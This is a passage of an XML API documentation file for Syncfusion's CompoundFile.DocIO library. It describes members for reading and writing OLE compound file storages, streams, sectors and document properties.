        <member name="F:Syncfusion.CompoundFile.DocIO.Native.Storage.DefaultStorageName">
            <summary>
            Default storage name. Used for root storage, others should assign some other value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.Storage.m_storage">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.Storage.m_arrStorages">
            <summary>
            Collection with storage names.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.Storage.m_arrStreams">
            <summary>
            Collection with stream names.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.Storage.m_strName">
            <summary>
            Name of the storage.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.CalculateSubItemsNames">
            <summary>
            Calculates subItems names.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.ByTypeAccumulate_Streams(Syncfusion.CompoundFile.DocIO.Native.STATSTG,System.Object)">
            <summary>
            Adds data.
            </summary>
            <param name="item">Item to add.</param>
            <param name="userData">Collection to add.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.ByTypeAccumulate_Storages(Syncfusion.CompoundFile.DocIO.Native.STATSTG,System.Object)">
            <summary>
            Adds data as stream type.
            </summary>
            <param name="item">Item to add.</param>
            <param name="userData">Collection where adding is.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.ByTypeAccumulate_All(Syncfusion.CompoundFile.DocIO.Native.STATSTG,System.Object)">
            <summary>
            Adds data as all type.
            </summary>
            <param name="item">Item to add.</param>
            <param name="userData">Collection where adding is.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.CalculateSubItems(Syncfusion.CompoundFile.DocIO.Native.Storage.SubItemNameEventHandler,System.Object)">
            <summary>
            Calculates subItems.
            </summary>
            <param name="caller">SubItem event handler.</param>
            <param name="userData">User data.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.#ctor(System.String,Syncfusion.CompoundFile.DocIO.Native.STGM)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="fileName">Name of the file to open.</param>
            <param name="storageOptions">Storage options.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.#ctor(Syncfusion.CompoundFile.DocIO.Native.IStorage)">
            <summary>
            Initializes new instance of the storage.
            </summary>
            <param name="root">Root substorage.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.#ctor(Syncfusion.CompoundFile.DocIO.Native.IStorage,System.String)">
            <summary>
            Initializes new instance of te storage.
            </summary>
            <param name="root">Root substorage.</param>
            <param name="storageName">Name of the storage.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.Finalize">
            <summary>
            Destructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.CreateStream(System.String)">
            <summary>
            Creates new stream inside this storage.
            </summary>
            <param name="streamName">Name of the stream to create.</param>
            <returns>Created stream object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.OpenStream(System.String)">
            <summary>
            Opens existing stream inside this storage.
            </summary>
            <param name="streamName">Name of the stream to open.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.DeleteStream(System.String)">
            <summary>
            Removes existing stream from this storage.
            </summary>
            <param name="streamName">Name of the stream to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.ContainsStream(System.String)">
            <summary>
            Determines whether storage contains specified stream.
            </summary>
            <param name="streamName">Name of the stream to check.</param>
            <returns>true if storage contains specified stream.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.CreateStorage(System.String)">
            <summary>
            Creates new substorage inside this one.
            </summary>
            <param name="storageName">Name of the storage to create.</param>
            <returns>Created storage object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.OpenStorage(System.String)">
            <summary>
            Opens existing substorage inside this one.
            </summary>
            <param name="storageName">Name of the storage to open.</param>
            <returns>Created storage object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.DeleteStorage(System.String)">
            <summary>
            Removes exisiting substorage from this one.
            </summary>
            <param name="storageName">Name of the storage to remove.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.ContainsStorage(System.String)">
            <summary>
            Determines whether this storage contains substorage with specified name.
            </summary>
            <param name="storageName">Name of the storage to check.</param>
            <returns>true if storage contains substorage with specified name.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.Flush">
            <summary>
            Commits changes.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.InsertCopy(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Inserts copy of the storage and all subitems inside current storage.
            </summary>
            <param name="storageToCopy">Storage to copy.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.InsertCopy(Syncfusion.CompoundFile.DocIO.CompoundStream)">
            <summary>
            Inserts copy of the stream inside current storage.
            </summary>
            <param name="streamToCopy">Stream to copy.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.Storage.Dispose">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.Storage.COMStorage">
            <summary>
            Returns internal COM storage. This property will be removed after implementing
            some document properties reading.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.Storage.Streams">
            <summary>
            Returns all stream names that are placed inside this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.Storage.Storages">
            <summary>
            Returns all storage names that are placed inside this stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.Storage.Name">
            <summary>
            Returns name of the storage.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.Storage.SubItemNameEventHandler">
            <summary>
            Delegate that represents subItem name event.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Native.PropVariant">
            <summary>
            The PropVariant is used for defining the type tag and 
            the value of a property in a property set.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.IPropertyData.SetValue(System.Object,Syncfusion.CompoundFile.DocIO.PropertyType)">
            <summary>
            Sets property value.
            </summary>
            <param name="value">Value to set.</param>
            <param name="type">Type of the property to set.</param>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.IPropertyData.Value">
            <summary>
            Gets property value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.IPropertyData.Type">
            <summary>
            Sets type of the variant. Write-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.IPropertyData.Name">
            <summary>
            Name of the property.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.IPropertyData.Id">
            <summary>
            Gets property id.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.TYPE_OFFSET">
            <summary>
            Offset to the type of the PropVariant.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.FirstIntOffset">
            <summary>
            Offset to the first int of the data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.IntSize">
            <summary>
            Size of the integer.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DEF_SHORT_PROPERTY_TYPE_MASK">
            <summary>
            Mask to get type of property or each element of the arrya (if property contains an array).
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DEF_LOW_INT_MASK">
            <summary>
            Bit mask for lower int value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DEF_HIGH_INT_MASK">
            <summary>
            Bit mask for higher int value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DEF_INT_BITS">
            <summary>
            Number of bits in every integer value.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DEF_FILETIME_TICKS_DIFFERENCE">
            <summary>
            Difference in ticks of FILETIME and DateTime.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DEF_LINK_BIT">
            <summary>
            Bit mask for LinkToContent property of the DocumentProperty class. 
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.PropVariantSize">
            <summary>
            Size of the native windows PROPVARIANT structure.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SecondIntOffset">
            <summary>
            Offset to the second int of the data.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.m_arrFree">
            <summary>
            Array of IntPtr that should be freed on dispose using Marshal.FreeCoTaskMem.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.m_arrGlobalFree">
            <summary>
            Array of IntPtr that should be freed on dispose using Marshal.FreeHGlobal.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.m_propVariant">
            <summary>
            Pointer to the PropVariant.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.m_prop">
            <summary>
            Specifies a property by its property identifier (ID).
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.m_arrDispose">
            <summary>
            Array of PropVariants that will be disposed in Dispose method.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Native.PropVariant.m_bFreeVariant">
            <summary>
            If True, then memory for the structure was allocated by 
            this class and should be freed on Dispose;
            otherwise, memory was not allocated by this class and should not be freed.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.#ctor(System.IntPtr)">
            <summary>
            Creates PropVariant with data pointed by ptr.
            </summary>
            <param name="ptr"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.#ctor(Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG,Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage,System.Boolean)">
            <summary>
            Reads data from IPropertyStorage.
            </summary>
            <param name="propInfo">Property description.</param>
            <param name="propStorage">IPropertyStorage to read data from.</param>
            <param name="bBuiltIn">Indicates whether property is built-in or not.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.GetStringArray">
            <summary>
            Returns array of strings.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.GetString(System.IntPtr)">
            <summary>
            Converts IntPtr to the string.
            </summary>
            <param name="ptrString">Value to convert.</param>
            <returns>Converted string.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.GetShortString(System.IntPtr)">
            <summary>
            Parses not unicode string.
            </summary>
            <param name="ptrString">Pointer to the sring to parse.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.GetObjectArray">
            <summary>
            Returns an array of objects.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SetStringArray(System.String[])">
            <summary>
            Fills PropVariant with array of strings.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SetObjectArray(System.Object[])">
            <summary>
            Fills PropVariant with array of objects.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SetBlob(System.Byte[])">
            <summary>
            Sets Blob property value.
            </summary>
            <param name="value">Value to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SetName(System.String)">
            <summary>
            Sets property name.
            </summary>
            <param name="strName">Name to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SetValue(System.Object,Syncfusion.CompoundFile.DocIO.PropertyType)">
            <summary>
            Sets property value.
            </summary>
            <param name="value">Value to set.</param>
            <param name="type">Type of the property to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.FreeResources">
            <summary>
            Frees all allocated resources.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.FreeName">
            <summary>
            Frees resuources allocated for property name storage.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.GetValue">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Write(Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage)">
            <summary>
            Writes variant to the property storage.
            </summary>
            <param name="storProp">
            Property storage that will receive PropVariant value.
            </param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Read(Syncfusion.CompoundFile.DocIO.Native.tagSTATPROPSTG,Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage,System.Boolean)">
            <summary>
            Reads information from the storage.
            </summary>
            <param name="propInfo">Property information.</param>
            <param name="storProp">Storage to read from.</param>
            <param name="bBuiltIn">Indicates whether property is built-in.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Read(Syncfusion.CompoundFile.DocIO.Native.IPropertyStorage,System.Boolean)">
            <summary>
            Reads information from the storage.
            </summary>
            <param name="storProp">Storage to read from.</param>
            <param name="bBuiltIn">Indicates whether property is built-in.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Dispose">
            <summary>
            Performs tasks associated with freeing, releasing, 
            or resetting unmanaged resources.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Finalize">
            <summary>
            Finilizer.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Int">
            <summary>
            Fills PropVariant with integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Int32">
            <summary>
            Fills PropVariant with integer value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.IntPtr">
            <summary>
            Gets / sets PropVariant memory.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.PropId">
            <summary>
            ID of the property that will be written into property storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.PropId2">
            <summary>
            Same as PropId.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.FileTime">
            <summary>
            Fills PropVariant with FILETIME value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Bool">
            <summary>
            Fills PropVariant with bool value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.String">
            <summary>
            Fills PropVariant with string value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.AsciiString">
            <summary>
            Fills PropVariant with string value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.DateTime">
            <summary>
            Fills PropVariant with FILETIME value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Double">
            <summary>
            Fills PropVariant with double value.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Name">
            <summary>
            Gets / sets property name.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Value">
            <summary>
            Returns value of the property. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.IsLinkToSource">
            <summary>
            Indicates whether it is property or just link to source of some property. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.ParentId">
            <summary>
            Returns id of the parent property. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Id">
            <summary>
            Gets property id.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.FirstInt">
            <summary>
            Sets first integer value of the variant. Write-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.SecondInt">
            <summary>
            Sets second integer value of the variant. Write-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Native.PropVariant.Type">
            <summary>
            Sets type of the variant. Write-only.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.ClipboardData.Format">
            <summary>
            Clipboard format.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.ClipboardData.Data">
            <summary>
            Clipboard data.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ClipboardData.Clone">
            <summary>
            Createas copy of the current object.
            </summary>
            <returns>A copy of the current object.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ClipboardData.Serialize(System.IO.Stream)">
            <summary>
            Saves clipboard data into stream.
            </summary>
            <param name="stream">Stream to write data into.</param>
            <returns>Size of the written data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.ClipboardData.Parse(System.IO.Stream)">
            <summary>
            Extracts data from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.CompoundFile">
            <summary>
            .Net compound file implementation.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.RootEntryName">
            <summary>
            Name of the root entry.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_stream">
            <summary>
            Source stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_header">
            <summary>
            File header.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_fat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_dif">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_directory">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_root">
            <summary>
            Root storage.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_shortStream">
            <summary>
            Short stream.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_miniFatStream">
            <summary>
            Stream containing items described by minifat.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_miniFat">
            <summary>
            MiniFAT.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.m_bDirectMode">
            <summary>
            Indicates whether substreams should maintain their own stream or should write
            directly into the file's stream.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Main">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.WriteDirectory(System.String,Syncfusion.CompoundFile.DocIO.Net.Directory)">
            <summary>
            Writes directory structure into file.
            </summary>
            <param name="path">Destination path.</param>
            <param name="directory">Directory to write.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.WriteStorage(System.String,Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Writes storage to specified path
            </summary>
            <param name="path">Destination path.</param>
            <param name="storage">Storage to write.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.WriteStream(System.String,System.String,Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Writes stream into file
            </summary>
            <param name="path">Destination path.</param>
            <param name="streamName">Stream name.</param>
            <param name="storage">Parent storage object.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.#ctor(System.IO.Stream)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.#ctor(System.String,System.Boolean)">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Open(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.InitializeVariables">
            <summary>
            Initializes internal variables.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.ReadSector(System.Byte[],System.Int32,System.Int32,Syncfusion.CompoundFile.DocIO.Net.FileHeader)">
            <summary>
            
            </summary>
            <param name="buffer"></param>
            <param name="offset"></param>
            <param name="sectorIndex"></param>
            <param name="header"></param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.GetEntryStream(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry)">
            <summary>
            
            </summary>
            <param name="entry"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.SetEntryStream(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry,System.IO.Stream)">
            <summary>
            Sets stream data for directory entry.
            </summary>
            <param name="entry">Directory entry to update stream data for.</param>
            <param name="stream">Stream to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.SetEntryLongStream(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry,System.IO.Stream)">
            <summary>
            Sets entrie's long stream.
            </summary>
            <param name="entry">Entry to update data for.</param>
            <param name="stream">Data to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.SetEntryShortStream(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry,System.IO.Stream)">
            <summary>
            Sets entrie's short stream.
            </summary>
            <param name="entry">Entry to update data for.</param>
            <param name="stream">Data to set.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.WriteData(System.IO.Stream,System.Int32,System.IO.Stream,Syncfusion.CompoundFile.DocIO.Net.FAT)">
            <summary>
            Writes stream data into compound file main stream
            </summary>
            <param name="destination">Main stream to write into.</param>
            <param name="startSector">Start sector to write.</param>
            <param name="stream">Stream to write.</param>
            <param name="fat">Fat object.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.AllocateSectors(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry,System.Int32,System.Int32,Syncfusion.CompoundFile.DocIO.Net.FAT)">
            <summary>
            Here we have to allocate required sectors number.
            </summary>
            <param name="entry">Entry to allocate sectors for.</param>
            <param name="iAllocatedSectors">Number of already allocated sectors.</param>
            <param name="iRequiredSectors">Number of required sectors.</param>
            <param name="fat">FAT object.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.AllocateSectors(System.Int32,System.Int32,System.Int32,Syncfusion.CompoundFile.DocIO.Net.FAT)">
            <summary>
            Allocates sectors.
            </summary>
            <param name="iSector">Start sector in the chain.</param>
            <param name="iAllocatedSectors">Number of already allocated sectors.</param>
            <param name="iRequiredSectors">Number of required sectors.</param>
            <param name="fat">Fat object.</param>
            <returns>Start sector of the added chain.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.GetSectorOffset(System.Int32,System.UInt16)">
            <summary>
            Gets offset to the sector.
            </summary>
            <param name="sectorIndex">Zero-based sector index.</param>
            <param name="sectorShift">Sector shift (2^sectorShift = sector size).</param>
            <returns>Offset to the required sector.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.GetSectorOffset(System.Int32,System.UInt16,System.Int32)">
            <summary>
            Gets offset to the sector.
            </summary>
            <param name="sectorIndex">Zero-based sector index.</param>
            <param name="sectorShift">Sector shift (2^sectorShift = sector size).</param>
            <param name="headerSize">Size of the header.</param>
            <returns>Offset to the required sector.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.CheckHeader(System.IO.Stream)">
            <summary>
            Checks whether stream header belongs to compound file.
            </summary>
            <param name="stream">Stream to check.</param>
            <returns>True if stream probably contains compound file data.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.AllocateDirectoryEntry(System.String,Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry.EntryType)">
            <summary>
            Allocates new directory entry.
            </summary>
            <param name="streamName">Name of the stream.</param>
            <param name="entryType">Entry type.</param>
            <returns>Created directory entry.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.RemoveItem(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry)">
            <summary>
            Marks item as free.
            </summary>
            <param name="directoryEntry">Directory entry to be removed/freed.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.ReadData(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry,System.Int64,System.Byte[],System.Int32)">
            <summary>
            Reads data from internal stream.
            </summary>
            <param name="entry">Entry to read data from.</param>
            <param name="position">Position inside entry stream.</param>
            <param name="buffer">Buffer that will cotain read data.</param>
            <param name="length">Size of the data to read.</param>
            <returns>Number of actually read bytes.</returns>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.WriteData(Syncfusion.CompoundFile.DocIO.Net.DirectoryEntry,System.Int64,System.Byte[],System.Int32,System.Int32)">
            <summary>
            Writes data into internal stream.
            </summary>
            <param name="entry">Entry to write data into.</param>
            <param name="position">Position inside entry stream.</param>
            <param name="buffer">Buffer containing data to write.</param>
            <param name="offset">Offset inside buffer to the data to write.</param>
            <param name="length">Size of the data to write.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Save(System.IO.Stream)">
            <summary>
            Saves compound file into stream.
            </summary>
            <param name="stream">Stream to save data into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.WriteStreamTo(System.IO.Stream)">
            <summary>
            Writes internal stream into specified one.
            </summary>
            <param name="destination">Destination stream to write into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.SaveMiniStream">
            <summary>
            Saves mini stream data.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.SerializeDirectory">
            <summary>
            Serializes directory entries.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Save(System.String)">
            <summary>
            Saves compound file into file.
            </summary>
            <param name="fileName">Name of the file to save into.</param>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Dispose">
            <summary>
            Performs application-defined tasks associated with freeing,
            releasing, or resetting unmanaged resources. 
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Header">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Directory">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Root">
            <summary>
            Returns root storage.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.DIF">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.Fat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.BaseStream">
            <summary>
            Returns base stream. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.DirectMode">
            <summary>
            Gets or sets value indicating whether substreams should maintain their own stream
            or should write directly into the file's stream.
            </summary>
        </member>
        <member name="P:Syncfusion.CompoundFile.DocIO.Net.CompoundFile.RootStorage">
            <summary>
            Returns root storage object for this file.
            </summary>
        </member>
        <member name="T:Syncfusion.CompoundFile.DocIO.Net.CompoundFileException">
            <summary>
            This is exception thrown when experiencing problems with compound file.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundFileException.DefaultExceptionMessage">
            <summary>
            Default exception message.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFileException.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.CompoundFile.DocIO.Net.CompoundFileException.#ctor(System.String)">
            <summary>
            Initializes new instance of the exception.
            </summary>
            <param name="message">Exception message.</param>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.m_parentFile">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.m_nodes">
            <summary>
            RBTree with child elements.
            </summary>
        </member>
        <member name="F:Syncfusion.CompoundFile.DocIO.Net.CompoundStorage.m_entry">
            <summary>
            
            </summary>
        </member>
